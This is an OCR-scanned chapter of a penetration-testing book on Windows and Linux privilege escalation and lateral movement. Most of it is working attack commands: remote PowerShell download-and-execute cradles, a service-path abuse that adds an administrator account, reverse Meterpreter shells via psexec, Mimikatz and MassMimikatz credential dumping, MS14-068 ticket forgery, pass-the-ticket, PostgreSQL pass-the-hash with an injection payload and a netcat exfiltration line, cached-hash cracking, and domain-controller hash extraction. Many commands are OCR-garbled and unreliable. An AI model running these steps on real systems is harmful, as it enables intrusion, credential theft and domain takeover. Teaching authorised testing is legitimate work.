PowerUp Privilege Escalation 


Removing your tracks is always important, so we need to make sure we set everything back to it’s 
original state after we get our admin account. Luckily again, harmjOy created a restore function to put 
the original executable back: 
e  powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net. WebClient). DownloadString(‘https://raw.githubusercontent.com/Veil- 
Framework/PowerTools/master/PowerUp/PowerUp.psl';  Restore-ServiceEXE - 
ServiceName omniserv 
o Restoring up ‘C:\Program  Files\Fingerprint Manager 
Pro\OmniServ.exe.bak' to ‘C:\Program Files\Fingerprint Manager 
Pro\OmniServ.exe' 
o Removing backup binary 'C:\Program Files\Fingerprint Manager 
Pro'OmniServ.exe.bak' 


Option 2: 
Metasploit has released a local exploitation module called Windows Service Trusted Path Privilege 
Escalation. {15} 


The concept of this vulnerability is to look for services that have unquoted paths for files it executes. 
In other words, if a service calls an executable like C:\Program Files\Demo File\Demo.exe and it 
doesn’t properly quote the full path name, we can take advantage of this. If we look at the folder name 
from our example, Demo File\, we see that there 15 a space between Demo and File. In Windows, 
this can either be treated as ‘Пето FileV" or if there happened to be a Demo.exe file in “C:\Program 


Files\’, it would execute the command “\Demo.exe File\’. To visualize this issue, let's look at two 
strings. The quoted string in the picture below is from the omniserv service from our prior example. 
We see that the BINARY PATH NAME has quotes around the executable path. However, the 
service name DACoreService calls a file that is not quoted. This is where the problem stems from. 





In this example, C:\Program Files (x86)\Dragon Assistant\Core\DACore.exe, we could create a file at 
C:\Program Files (x86)\Dragon.exe and the service will treat the File Dragon.exe as input to the 
executable. To execute a file as a potential system user, we just need to create a service executable in 
the path. Let’s walk through the whole process. 


First, we need to identify if we have any Trusted Path Issues. From the Invoke-Allchecks above, we 
see that DACoreService is vulnerable to the unquoted service path vulnerability. 


e [*] Checking for unquoted service paths... 

e |*] Use 'Write-UserAddServiceBinary’ to abuse 

e [+] Unquoted service path: DACoreService - C:\Program Files (x86)\Dragon 
Assistant\Core\DACore.exe 


Let’s take advantage of it. Again, we will call: 
e powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net.WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerToo 
Write-UserAddServiceBinary -ServiceName DACoreService -Path Dragon.exe 


Now, if you have the proper privileges, move Dragon.exe to C:\Program Files (x86)\. When we get a 
reboot or when an admin stops and starts the DACoreService service, we will get a new user account 
(John) as part of the Administrators Group. 


Reboot the host: 


ө shutdown -r -f -t 0 





C: \windows\svstem32>ne start DACoreService 
Æ lusrmgr - [Local Users and Groups (Lo... 
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PowerUp - Account Creation 


Zero To Hero - Linux: 


On Linux, we run into the same issues. We are looking for files that are world-writable, SUID/GUID 
files owned by root, and misconfigurations. Two different tools to look for these privileges are unix- 
privesc-check and LinEnum. 


e https://code.google.com/p/unix-privesc-check/source/checkout 
e https://github.com/rebootuser/LinEnum 


Move this software over to the victim host and run them. 


Lastly, for a good list of Linux/Unix based privilege escalation exploits: 


e https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack 


With Any Local Administrative or Domain Admin Account: 


Hopefully, in the prior chapter, you were able to gain access to a local administrative account that 
works on all of the users' machines or maybe even a domain admin account. What are some of the 


next steps for your newly-found credentials? This section is dedicated to continually owning the 
network. 


Owning The Network With Credentials And Psexec: 


In my last book, once you had a username and password, if you wanted to get another Meterpreter 
shell on another host, you had to use psexec. The problem was that the default payload would trigger 
most AV systems, so we had to create a Meterpreter payload first using Veil and attaching that. Let’s 
go through that first to see what we used to do: 
e Go to Veil located in /opt/Veil and execute ./Veil 
e list and use payload 
e set your LHOST and LPORT 
e generate using pyinstaller 
e Now go to metasploit, use psexec with the custom payload 
o msfconsole 
o use exploit/windows/smb/psexec 
o set PAYLOAD windows/meterpreter/reverse https 
o set LHOST [IP of My Box] 
o set LPORT 443 
o set SMBUser TestAccount 
o set SMBPass MyPassword 
o set SMBDomain fakeDomain 
o set EXE::Custom /root/veil-output/compiled/veil file.exe 
o set RHOST [IP of Remote Host] 


This worked great in the past and we were able to get around AV. Additionally, I have seen some AV 
in the past year start picking up on python executable payloads. As seen throughout the book, this is 
definitely is a cat and mouse game. That 1s what makes penetration testing so much fun. 


This is where psexec psh comes into play. Just like psexec, what psexec psh does is mimic the 
sysinternals tool psexec to log into the victim host and execute a payload. What psexec psh does 
differently is use PowerShell encoded commands to mimic the old psexec. You will get back a 
Meterpreter shell, but this time nothing will touch disk at all. No need to create a custom payload to 
evade AV. 


e use exploit/windows/smb/psexec psh 
e set RHOST 172.16.151.202 

e set SMBUser lab 

e set SMBPass ''Asdfasdfasdfl !' 

e set SMBDomain hacker.testlab 

e set LHOST 172.16.151.141 


e set PAYLOAD windows/meterpreter/reverse https 
e exploit 


» set SMBUser lab 
> set SMBPass '!Asdfasdfasdfl!' 
set SMBDomain hacker.testlab 


» set LHOST 172.16.151.141 


reverse handler on https: 
- Executing the payload 
if running a command or n 


taging connection fór |tafget yfCKh (гебеіуей. .{ 
opened (172.16.151%141:8443\ -» 172.116 J15 32 





psexec psh 
Now moving laterally through the network becomes that much easier and that much more silent. 


Once we have a successful Meterpreter session, we will interact with that session with the command: 
ө sessions -1 [session number] 


One of the common next steps is to run Mimikatz against the system. If you run into a system that is a 
64-bit system, you will have to first migrate into a 64-bit process. The reason I want to utilize a 64- 
bit process is because that is the only way Mimikatz will be able to look for the clear text passwords 
in 64-bit systems. If it is a 32-bit system, you can still migrate into another process if needed, but it 
might not be necessary. 


To list all of the processes, we will use the "ps" command. To migrate, we will use the command 
"migrate [pid]". In the example below, we identified Notepad running as a 64-bit process and 
migrated into it. 

e ps 

e migrate [pid ofa x86 64 process] 


You might need to become "system" before doing any of these commands. You can do this by issuing 
the following command: 

e getsystem 

e If you get denied and are a local admin, see the Bypass UAC section. 


Once migrated and running as system, we want to load Mimikatz and type the command kerberos (or 


you can use wdigest). This should give us the clear text passwords of the current users logged in. 
e kerberos 
ө wdigest 


Le\Chrome\AppLication\chrome.exe 


mhost . ехе 


meterpreter > migrate 3040 
A чл 


AuthIL Package Domain 


Negotiate NT A 
fakeDomain 
fakeDomain 


Mimikatz 





We now have another account and password to utilize. In addition to Mimikatz, there are also other 
post modules in Metasploit that you might want to look into, such as Incognito{16}and 
Smart HashDump{17}. These should get you enough access on this host for the time being. 


Psexec Commands Across Multiple IPS (Kaii Linux) 


Since we have credentials that have local administrative access, there are times where I don't want to 
compromise every host, and instead, just run commands on these hosts. For example, some commands 
you may want to run on all hosts are: 
e net group "Domain Admins" /domain (list all Domain Admins on servers) 
e qwinsta (list about user session information) 
e Create Additional Administrative Accounts on All Hosts 
o net user username password /ADD /DOMAIN 
o net group "Domain Admins" username /ADD /DOMAIN 
o net localgroup Administrators username /ADD 


Royce Davis took the original psexec code and modified it so it does not upload any binaries, but 
achieves command line remote code execution in memory. This allows you to avoid AV detection and 


run threaded commands on multiple systems. I will show you a quick example: {18} 
e use auxiliary/admin/smb/psexec command 
e set RHOSTS [IP or IP Range] 
e set SMBDomain [Domain Info | 
e set SMBPass [Password] 
e set SMBUser [User] 
e set COMMAND [command you want to run at the command line] 
e exploit 


fst auxiliary > use auxiliary admin smb/psexec, Command 
151 auxiliary( ) > set RHOSTS 172.16.139, 196 

RHOSTS => 172.16.139.196 

nsf auxiliary (MM) > set SM8Domain corp. fakedomain. test lab 


SMBDomain => corp. fakedomain.testlab 
auxi lior aan > set SMBPass !AdminlAccount! 
BMBPass => !AdminlAccount! 


auxiliary (MM) > set SMBUser Admin Account 
BMBUser => Admin Account 

auxiliary (RRM) > set COMMAND qwinsta 
OMMAND => qwinsta 


sf auxiliary (ШЕЕ > show options 


odule options (auxiliary/admin/smb/psexec command): 


Name Current Setting Required Description 


COMMAND qwinsta y command you want 
RHOSTS 172.16.139.196 y | target address га 
RPORT 445 y зе Target port 
SMBDomain corp.fakedomain.testlab no Windows domain to 
SMBPass ! AdminlAccount ! no пе password for the 
SMBSHARE C$ yes name of a writeab 
SMBUser Admin Account no username to authe 
THREADS 1 yes number of concurr 
WINPATH WINDOWS yes name of the remot 


auxiliary (RRR) > exploit 


172.16.139.196:445 - Executing the command... 
172.16.139.196:445 - Getting the command output... 
172.16.139.196:445 - Command completed successfully! Output: 
SESSIONNAME USERNAME ID STATE TYPE 
"services 0 Disc 
console administrator 1 Active 


172.16.139.196:445 - Executing cleanup... 
172.16.139.196:445 - Cleanup was successful 
Scanned 1 of 1 hosts (100% complete) 


[ее Ё = 107 compLeT ed 
psexec command 





In the Pregame chapter, during the Setting Up Your Box phase, you had the option of enabling logging 
for Metasploit. This is one area where logging can be very helpful. If you want to execute code on /24 
network or larger, the output is going to be pretty extensive. If you need to parse through it, it is much 
easier to have Metasploit log the traffic and grep that file. In the previous command, I was able to run 
the qwinsta command on every host and link IPs with usernames. If I have a list of IT administrators, I 
can directly attack their box instead of compromising all the hosts on the network. 


Move Laterally With WMI (windows) 


A better option to move laterally is using WMI or Windows Management Instrumentation. WMI is 
used to manage systems and is installed by default on all new Windows operating systems. We can 
take advantage of WMI to remotely execute commands on other systems on which we have access. 
Since we have compromised our victim and pulled hashes, we can now find an account with elevated 
privileges and run commands on remote hosts using those credentials. In the example below, we 
compromised a user “‘testuser1” that has access to another host. We can use WMI to execute Mimikatz 
remotely, write it out to a file in the public folder, and read that file: 


ө wmic /USER:"hacker\testuser 1" /PASSWORD:"!Asdfasdfasdfl !" 
/NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New- 
Object 


Net.WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerSplc 
Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" 

e dir \\win8\c$\Users\Public\ 

e type \\win8\c$\Users\Public\a.txt 

ө del \\win8\c$\Users\Public\a.txt 


As you can see from the image below, we are currently on the host win7. We execute a wmic call to 
remotely execute a PowerShell script against the host win8 to run Mimikatz and dump it out to a file. 
Next, we will read that file from our win7 host. 


ic /USER: "пас ker\testuserl" / RD : ' к айа sdfl!' /NO IDE :1 
ect Net. WebClient).DownloadString( TUS / .githubuserconter 


t e-Mimikatz -DumpCreds de Out-File C: \Users\ oy ic NBS EXE 
mic /US SER: "hac ker testuserl" /PASS ): sdfasdfasdfl Ж: 172.16.151.201 proce 
bject Net. i raw.gi thubusercontent.com cheetz /PowerS 
sers\\public\\a.tx с 


S\PUBLLC\a.txt 


release. "Kiwi en С! (Мау.„20@ 2914..08:56:48) 





Remote PowerShell Execution with WMI 


This is done all remotely in memory without any executables being run. 
So is there a better way to do all this? Harmjoy created a MassMimikatz tool that, for the most part, 
does the same thing. {19} Let’s take a look at this. 


MassMimikatz will first start up a web server for the Mimikatz code. This is why we are going to set 
a FireWallRule in the switch statement. Next, the script will use WMI to execute PowerShell scripts 
on the hosts using the cached credentials on each system, and store the results in a folder called 
MimikatzOutput. Let’s see this in action against a few win7 and win8 systems. 
e  Powershellexe -NoP -Nonl -Exec Bypass IEX (New-Object 
Net.WebClient). DownloadString(‘https://raw.githubusercontent.com/cheetz/PowerToo 
MassMimikatz.ps 1"); '"win7','wins' | Invoke-MassMimikatz -Verbose -FireWallRule" 


C:\Windows \systend?>Powershell exe HoP -Mi Exec Bypass ТЕХ (New tingi https: 
er Tools /master/PewPewPew/ Invoke-Masshigikatz.ps1°): “wins, wind: Invoke Verbose -FireWallRule 
VERBOSE: Setting inbound firewall rule for port 8888 
VERBOSE: Sleeping, letting the web server stand up... 
VERBOSE: Executing command on host win? 
VERBOSE: Executing command of host win’ 
VERBOSE: Waiting 38 seconds for commands ta trigger... 
VERBOSE: Parsing output from folder "Mimikatzüutput' 
Credential 
testuser] /HACKER: баазаа 796 209356е094800езерре 
testuserl/HACKER: lAsdftasdfasdtl! 
Lestuserl/HACRER: TAsdrasdtasdtl! 
testusarl HACKER. TESTLAR: !Asdtasdtasdtl! 
Jab/HACKER :Ваазд с4а agadi 56e09dsddeSebbe 
lab HACKER: !Asdfasdtasdt] 
Jab/HACKER: |Asdfasdfasdé]! 


NESE Re an re RT ae 
lab HACKER. TESTLAB; !Asdfasdfasdfl 


VERBOSE: Removing inbound firewall rule 
WERBOSE: Killing the web server 





MassMimikatz 


We don’t need to worry about password cracking at all, as we will use the speed and efficiency of 
MassMimikatz to pull clear text passwords. 


Kerberos - MS14-068: 


Kerberos had a lot of large vulnerabilities in the past couple of years. One of the biggest 


vulnerabilities was MS14-068. This gave any domain user the ability to privilege escalate to domain 
administrator. If you don’t have a great understanding of Kerberos yet, this would be a great time to 
get a refresher. If you do have a good understanding of Kerberos, keep moving forward. 


As we know, Kerberos is used for authentication and authorization. The underlying issue is that the 
Privilege Attribute Certificate (PAC), which stores information such as account name, ID, and group 
membership information, can be forged. This means that, with some basic information on a domain 
user, you have the ability to move to domain administrator. 


e git clone https://github.com/bidord/pykek /opt/pykek/ 
e apt-get install krb5-user 

e apt-get install rdate 

e rdate -n [Domain] 

e echo 172.16.151.200 dc.hacker.testlab >> /etc/hosts 


We are going to need to know four pieces of information: 
e -u username@domain [example: limiteduser@hacker.testlab 
e -d domain controller [example: dc.hacker.testlab 
e -p password 
e -s SID [example: S-1-5-21-3525058729-1821581466-2040179600-1111] 


We should have all the information except for the SID. To get the sid, just run this command on any 
limited user account: 
e whoami /user 


>:\Users\limiteduser>whoami /user 


JSER INFORMATION 


ser Name 





hacker*liniteduser 5-1-5-21-3525058729-1821581466-209401 79608-1111 





Retrieving SID information with Whoami 


Now that we have all the pieces we need: 
e cd /opt/pykek/ 
e python ms14-068.py -d dc.hacker.testlab -u limiteduser@hacker.testlab -s S-1-5-21- 
3525058729-1821581466-2040179600-1111 -p '!Asdfasdfasdfl !' 





root@kali: /opt/pykek | 


File Edit View Search Terminal Help 


chacker -testlab Ù limiteduser@hack 
3 79600 - 11р Asdfasdfasdfl 


er.testlab.ccache 





Creating the ccache Kerberos File 


We have a credential cache ticket generated and to use it we copy it to tmp/krbScc_0: 
ө cp TGT_limiteduser@Whacker.testlab.ccache /tmp/krb5cc_0 

You can now access the host using: 
e smbclient -k -W hacker.testlab //dc.hacker.testlab/c$ -k 


The other option is to push the credential cache ticket and the mimikatz executable to the victim host 
and run: 
e mimikatz.exe "kerberos::ptc TGT_limiteduser@hacker.testlab.ccache" exit 


You are able to do a dir \\dc\c$ and have full access to the victim host. 


More info: 


e https:// reme н т 





каш deca 


Pass-The-Ticket 


We should all be pretty familiar with Pass-the-Hash attacks from the previous book and this book as 
well. With all the Kerberos attacks, it is possible to pass Kerberos tickets as well. Let’s walk through 
an example of stealing Kerberos authentication tickets to impersonate users throughout the network. 
1205 


C:\mimikatz_trunk\x64>dir \\dc\ 
Access is denied 


C:\mimikatz_trunk\x64>mimikatz 
mimikatz 2.0 alpha (x64) release "Kiwi en C" (Jan 22 2015 22:16:09) 


м »* м 


Benjamin DELPY ‘gentilkiwi ( benjamin@gentilkiwi.com ) 
http://blog.gentilkiwi.com/mimikatz (oe. eo) 


with 15 modules x м 


mimikatz # privilege: :debug 
Privilege ‘20° OK 


mimikatz # sekurlsa::tickets /export 


Authentication Id 8 307551 (00000000 :0004b15f) 

Session Interactive from 1 

User Name testuser1 

Domain HACKER 

SID S-1-5-21-3525058729-1821581466-2040179600-1106 





Kerberos Tickets 


ө privilege :: debug 
e sekurlsa::tickets /export 


The export command will write all of the Kerberos tickets to the folder from which it was executed. 
In the example below, we see the user account “lab” that we recovered. We know from the start that 
“lab” was a domain administrative account. 


В mimikatz 2.0 alpha x4 (oeeo) 


Group B - Ticket Granting Service 
(00000000 | 
Start /End/MaxRenew: 2/8/2015 16:32:37 PH : 2/9/2015 8:32:28 AH : 2/15/2015 10:32:28 PH 
Service Name (02) : ldap ; de hacker. testlab ; @ HACKER. TESTLAB 
Target Name (62) : ldap ; de.hacker.testlab ; @ HACKER, TESTLAB 
Client Name (O1) : lab : @ HACKER. TESTLAB 
IU EC паве kanonicalize ; ok as delegate ; pre authent ; renewable ; forwardable ; 
5006100 Key OxO0G00012 - 80256 haac 
99да bed] de shade 222907321 0150053de8088021 [309 d8Z [19113831 1423 
Ticket К РДҮН ҮТ kung = 4 por 
« Saved to file [0;abSbF]-0-0-40a50000- abi] dap-de hacker. testlab.kirbi ! 
[80860861 ] 
Start /End/MaxRenew: 2/8/2015 10:32:36 PH : 2/9/2015 8:32:28 АМ : 2/13/2015 10:32:28 PH 
Service Name (82) : LOAP ; OC hacker. testlab ; hacker. testlab ; @ HACKER, TESTLAB 
Target Name (02) : LOAP : DC hacker.testlab : hacker. tostlab ; @ HACKER. TESTLAB 
Client Name (01) : lab ; 0 HACKER TESTLAB ( HACKER. TESTLAB ) 
IUE паве canonicalize ; ok as delegate : pre authent ; renewable ; forwardable ; 
5@%8100 Key 0х00000012 = aeszob hmac 
8fB13dasb3cF2bOTd! di2dibbeOlbaf FO2afF6B FOR T3771 75104b03588enb5b8 
Ticket 0х00000012 - aesz5b hmac kuna 1 4 D] 
х Saved to file (0:abSb#]-0-1-46150000-LabOLDAP-D¢ hacker. testlab.kirbi | 
[80080002] 
start/End/MaxRenew: 2/8/2015 10:32:29 РИ; 2/3/2015 8:32:28 АМ ; 2/15/2015 10:32:26 PH 
service Name (02) : HOST : DC hacker. testlab : @ HACKER. TESTLAB 
Target Name (02) : HOST ; DC hacker. testlab ; @ HACKER. TESTLAB 
Client Name (81) ; lab : @ HACKER TESTLAR 
Flags 40850000  : name canonicalize ; ok as delegate ; pre authent ; renewable ; forwardable ; 
Session key 000000812 = aeszob hmac 
Fi2F332T088408d03F Te T9FF 23] ba2332c c НЕКЕ I fde Jade 7650262 
Ticket 0400000012 = aes296 hmac kuno = 4 "n 
к Saved | to file [B8;ab3bF]-0-2-30850000- labgh0sT- 0С hacker. testlab.kirbi | 


Kerberos Tickets 


If we look in the same folder, we see a Kerberos krbtgt ticket for the user account lab. We need to 
import that as one of our Kerberos tickets. Then, drop back into Mimikatz: 
e kerberos: :ptt [0;abObf] 





cd60868dee3c4fdl d4SdcdabS41 b3aae892735Saa9daas5aa3 Sefe4l aeSf 
Ticket 0x00000012 - aes256_hmac 0:2 [ ] 
х Saved to file [0;3e7]-2-1-40e10000-WIN7$@krbtgt-HACKER.TESTLAB.kirbi ! 


mikatz # kerberos::ptt [0;ab9bf]-2-1-40010000-lab8krbtgt-HACKER. TESTLAB.kirbi 
- File '[0;ab9bf]-2-1-*40010000-lab8krbtgt -HACKER. TESTLAB . kirbi OK 


C:\mimikatz_trunk\x64 
Volume in drive \\dc\ 
Volume Serial Number 


PerfLogs 
Program Files 
ran Files 


21,404,258,304 bytes free 





0:4b114]-0-1-40a50000-testuser1 @ldap-dc.hacker.testlab.kirbi 
[0:4b114]-0-2-40a50000-testuser1 @LDAP-DC.hacker.testlab.kirbi 
[0;4b114]-2-0-60a10000-testuser1 @krbtgt-HACKER.TESTLAB.kirbi 
0;:4b114]-2-1-40e10000-testuser1 @krbtgt-HACKER. TESTLAB.kirbi 
0;ab9bf]-0-1-40a50000-labGLDAP-DC.hacker.testlab.kirbi 


[0;ab9bf]-0-2-40a50000-labG HOST -DC.hacker.testlab.kirbi 





[0;ab9bf]-2-0-60a10000-lab@krbtgt-HACKER.TESTLAB.kirbi 
[0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi 


| "Kerberos - Pass-the-Ticket 


Once we drop out of Mimikatz, we can do a directory listing on the domain controller and get a 
listing. We now have a Kerberos ticket as a domain administrative account. 


Lateral Movement With Postgres SOL 


I love lateral movement as it takes creativity and an understanding of how exactly technologies work. 
On versions of PostgreSQL v9.5 and earlier (remember that most orgs that I found do not regularly 
patch PostgreSQL), lies a vulnerability that allows a pass-the-hash authentication. This was 
originally found by Jens Steube and Phillipp Schmidt and allows an attacker to authenticate to 
PostgreSQL databases that utilize ChallengeResponse Authentication using the AUTH REQ MD5 
method or simply configuring "md5" as the Host Based Authentication (HBA) in pg hba.conf. {21} 


Here is their amazing paper on how they discovered that during the authentication process, the actual 
password is not checked, but instead has the hash: 


https://hashcat.net/misc/postgres-pth/postgres-pth.pdf. 


Let's say you are on an internal penetration test, and you used SQLMap or a similar tool to identify an 
SQL injection on a web page that utilizes a postgreSQL backend. It might look something like: 
ө http://postgres.suck.testlab/search.php?search=weapons'union select 


null,concat(usename,passwd) FROM pg shadow-- 
e http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 


The result will be a list of hashes of all the users: 
e postgres,md532e121215ba27cb750c9e093ce4b5127 
e secretloginmd598d21549d6420160b54f7898a7ff60cc 
e john,md5cbfafle32c711ee7ba63b5b6518a777b 
e test,md505a671c66aefea124cc08b76ea6d30bb 


We could spend time dropping it in oclhashcat and trying to crack the passwords, but due to the PTH 
issues, we can actually connect to all the other postgresql servers with just the hash. Let's walk 
through how this is done. We are going to pull a copy of postgresql onto our box, download the patch, 
apply the patch, and configure and install our modified version of psql. Psql is just an interactive 
terminal to connect to postgres. With our modified version, we can now supply hashes instead of 
passwords. 


I tested this with Postgres Commit: a2e35b53c39b2a27d3e332dc7c506539c306fd44 
ө mkdir /opt/postgresql/ && wget 
https://github.conypostgres/postgres/archive/a2e35b53c39b2a27d3e332dc7c506539c: 
&& unzip a2e35b53c39b2a27d3e332dc7c506539c306fd44.zip -d /opt/ && mv 
/opt/postgres-a2e35b53c39b2a27d3e332dc7c506539c306fd44 /opt/postgresql/ && 
cd /opt/postgresql/ 
e wget https://hashcat.net/misc/postgres-pth/postgresql diff clean.txt 
e git apply postgresql diff clean.txt 
e /configure 
e make && make install 
e cd /usr/local/pgsql/bin/ 
e /psql -h [IP of PostgreSQL server] -U postgres 
e Supply hash of the postgres user 


But why stop there? To show you what you can do once you are logged in as the privileged Postgres 
user, we will read the /etc/passwd file. 

e CREATE TABLE mydata(t text); 

e COPY mydata FROM "etc/passwd'; 

e SELECT t FROM mydata LIMIT 5 OFFSET 1; 


root@kali: /usr/Local/pgsqUbin 


File Edit View Search Terminal Help 

A L/pgsq inf ./psql - 199.132 -U postgres 
Hash for user postgres: md532e12f215ba27cb75 2093ce4b5127 
psql (9.5devel, server 9.1.13) 


Type "help" for help. 


postgres=# CREATE TABLE mydata(t text); 
CREATE TABLE 

res=# COPY mydata FROM '/etc/passwd'; 

C 44 

postgres=# SELECT t FROM mydata LIMIT 5 OFFSET 1; 





Pass-the-Hash with PostgreSQL 


We can also run command shells to fully compromise the host. 

e CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS 

'/lib/libc.so.6', 'system LANGUAGE 'C' STRICT; — privSELECT system('cat 

/etc/passwd | nc 10.0.0.1 8080’); 

e http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 
If you want to run this exercise in a controlled environment, the version installed on Kali Linux 
(before any updates) should be vulnerable as long as it is older than v9.5. If it is not, you will have to 
uninstall PostgreSQL before installing the vulnerable version. Once installed, create a new user (in 
this case “thp”), create a database, and print out the hash: 

e sudo -u postgres psql 

e create user thp createdb createuser password 'thp'; 

e create database thp owner thp; 

e select (usename,passwd) FROM pg shadow; 

e Grab the created hash password for the “thp” user 

e Run the example above, but instead of the user “postgres” use “thp” 


Pulling Cached Credentials 


Did you ever try to log onto your laptop while you weren't on the network? How can you authenticate 
without being connected to the domain? It is because Windows stores the last ten users with 
successful logins by default. If we can dump this, this is another way to find additional credentials. 
We won't be able to pull these passwords in clear text, so we will have to try to crack these 
credentials. 


What types of users might you see? Of course the user of the laptop, but you will usually also find an 
account like “helpdesk” or similar, as they originally set up the machine. In the next example, we will 
assume you already have a Meterpreter shell on our victim host and we will use Metasploit's 
cachedump module to pull these creds. 





e use post/windows/gather/cachedump 
ө set SESSIONS 1 


e show options 
e exploit 
[*] Executing module against win7 
[*] Cached Credentials Setting: - (Max 15 50 and 0 disables, and 10 is default) 
[*] Obtaining boot key... 
[*] Obtaining Lsa key... 
[*] Vista or above system 
[*] Obtaining LKSKM... 
[*] Dumping cached credentials... 
[*] Hash are in MSCACHE VISTA format. (mscash2) 
[*] MSCACHE v2 saved in: 
/root/.msf4/100t/20150128134030 default 192.168.199.1 mscache2.creds 209900.txt 
[*] John the Ripper format: 
# mscash2 
domain admin:Shacker$Zdomain admin£06198c06198c06198c06198c06198c9:HACKER.TESTLAI 


To Crack in oclHashCat: 
If itis in a file, the proper format is: 
$DCC2$10240#account_name#hash 


Although using faster GPUs helps, the major problem with cached credentials is that it is very very 
slow to crack. Attacking cached credentials is usually an approach that you might take if you can't 
move laterally or need to crack in the background while you continue to attack. Let’s look at the 
oclHashcat command: 

e oclHashcat64.exe -m 2100 hashes\mscash72.txt lists\crackstat_realhuman_phill.txt 


Session.Name...: oclHashcat 
: Running 
: File <rules\InsidePro-HashManager.rule> 
: File (lists\crackstat_realhuman_phill.txt)> 
: $DCC2$10240ttest1#607bbe89611637446e736F 7856515 bF8 
: DCC2, mscash2 
ime .Started...: Thu Jan 29 21:04:21 2015 (1 sec) 
ine.Estinated.: Tue Feb 17 85:18:41 2015 (18 days, 8 hours) 
Speed. GPU. WI... : 135.1 kH/s 
„„* 140.9 kH/s 


-.: 276.6 kH/s 
: 8/1 «8.80875 Diy s, W/1 (8.8875 Salts 
ress.......: 405504/410478832235 (0.080; 
'@........: 0/405504 (0.007) 
: 8/405504 (8.8807) 
..: 99% Util, 45c Тепр, N/A Fan 
: 100% Util, 49с Temp, N/A Fan 


VEM oclHashcat 
: Aborted 
..... Pile Crules\InsidePro-HashManager.rule> 
ree : File (lists\crackstat_realhuman_phill.txt) 
амдеб....: $D0C2$16240ttest1#607bbe89611e37446e736F 7856515 bF8 
».s...3 DCC2, mscash2 
: Thu Jan 29 21:04:21 2015 (3 secs) 
: Thu Feb 19 88:32:47 2815 (26 days, 11 hours? 
- 135.0 kH/s 
140.9 kH/s 
с 24.9 ki/s 
: 0/1 (8.08%) Digests, 0/1 (8.08%) Salts 
--: 698368/4104'78832235 (0.00; 
: 67698368 (8.887) 
> : @/698368 <(0.00x) 
IuMon.GPU.H81...: 20x Util, 46c Temp, N/A Fan 
WMon.GPU.#2...: @% Util, 46c Temp, N/A Fan 


tarted: Thu Jan 29 21:84:21 2015 
stopped: Thu Jan 29 21:84:25 2015 





oclHashcat - mscash2 


We can decide to add a rule to cracking our mscash2 hash with the command: 
e oclHashcat64.exe -m 2100 hashesNnscash2.txt lists crackstat realhuman phill.txt -r 
rules\InsidePro-HashManager.rule --force 


We are now looking at about 20 days to crack this hash. Although mscash2 hashes are extremely 
valuable, the amount of time it takes to crack might not be feasible on a one-week penetration test. 
This could be used for more long-term attacks. 


Attacking The Domain Controller: 


If you were lucky enough to get a local administrative account or a domain admin account, the next 
target is usually the Domain Controller (DC). One of the happiest moments for any pentester is when 
they successfully pull all the hashes out of the DC. 


Even with administrative credentials, we don't have access to read the hashes on the Domain 
Controller that are stored in the c:\Windows\NTDS\ntds.dit file. This is because that file is read- 
locked as Active Directory constantly accesses it. The solution to this problem is to use the Shadow 
Copy functionality natively in Windows to create a copy of that file. {22} 


SMBExec 
(https://github.com/bravOhax/smbexec) (Kali Linux) 


This is where a tool called SMBExec comes into play. SMBExec, a tool made by bravOhax, grabs the 
SYS reg keys and ntds.dit file using the Shadow Copy functionality. Let's take a look at the SMBExec 
module that we installed in the Setting Up Your Box section. 
e Running SMBExec 
o ed /opt/smbexec 
o ./smbexec 
e Select 3 for Obtain Hashes 
e Select 2 for Domain Controllers 
e Provide username/hash/domain/IP/NTDS Drive/NTDS Path 





SMBExec - Volume Shadow Copy 


We just saw that SMBExec connected to the Domain Controller with valid credentials, validated 
paths, and attempted to create a Shadow Copy of the ntds.dit and sys files. Once this was completed, 
SMBExec tried to parse through those files and collect and store all the password hashes from LDAP. 


Once SMBExec finishes and is successful, it creates a folder in the same directory based on a date- 
time stamp. If you go into this folder you will see a file called [domain]-dc-hashes.Ist. 


tds.dit nt 





SMBExec Results 


Inside the example compromised domain controller, I am able to find the NTLM hashes for the 
following users: 


Administrator: 500: 
aad3b435b51404eeaad3b435b51404ee:8b9e471f83d355eda6bf63524b044870::: 

Guest: 501: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 

admin account: 1000: 
aad3b435b51404eeaad3b435b51404ee:954bf28f34e47904f5c8725650f27283:: 

krbtgt: 502: aad3b435b51404eeaad3b435b51404ee:876c4efd01dbf8da6cd04c60ddac0f95::: 
bobsmith: 1105: aad3b435b51404eeaad3b435b5 1404ee: 8 faf590241a5d5ed59fb80eb00440589::: 
domainadmin: 1106: 
aad3b435b5 1404eeaad3b435b5 1404 ee: 8faf59024 laS5d5ed59fb80eb00440589::: 

pmartian: 1107: aad3b435b5 1404eeaad3b435b5 1404ee: 8 faf59024 1a5d5ed59fb80eb00440589::: 


Remember that if you are querying a large domain controller, go grab a coffee, as this will take a 
considerable amount of time. After you collect all these hashes, you can start password cracking or 
utilize the passing of hashes to continually exploit boxes. 


PSExec NTDSgrab 
(http://www.rapid7.com/db/modules/auxiliary/admin/smb/psexec_ntdsgrab) (Kali Linux): 


Another great way to dump hashes is with a metasploit module called psexec_ntdsgrab. Similar to 
SMBExec, PSExec NTDSGrab “authenticates to an Active Directory Domain Controller and creates 
a volume shadow copy of the 99S YSTEMDRIVE?^. It then pulls down copies of the ntds.dit file as 
well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM hive copy can be used in 
combination with other tools for offline extraction of AD password hashes. All of this is done without 
uploading a single binary to the target host." {23} 


With local/domain administrator credentials, let’s grab the domain hashes: 
e msfconsole 


e use auxiliary/admin/smb/psexec ntdsgrab 
e Make sure to SET the fields for RHOST, SMBDomain, SMBPass, and SMBUser 
e exploit 


ription toto de 
display nane 


suthentic ati 
nane 





Using psexec_ntdsgrab 


If grabbing the NTDS.dit file was successful, Metasploit will drop the file to the /root/.ms4/loot/ 
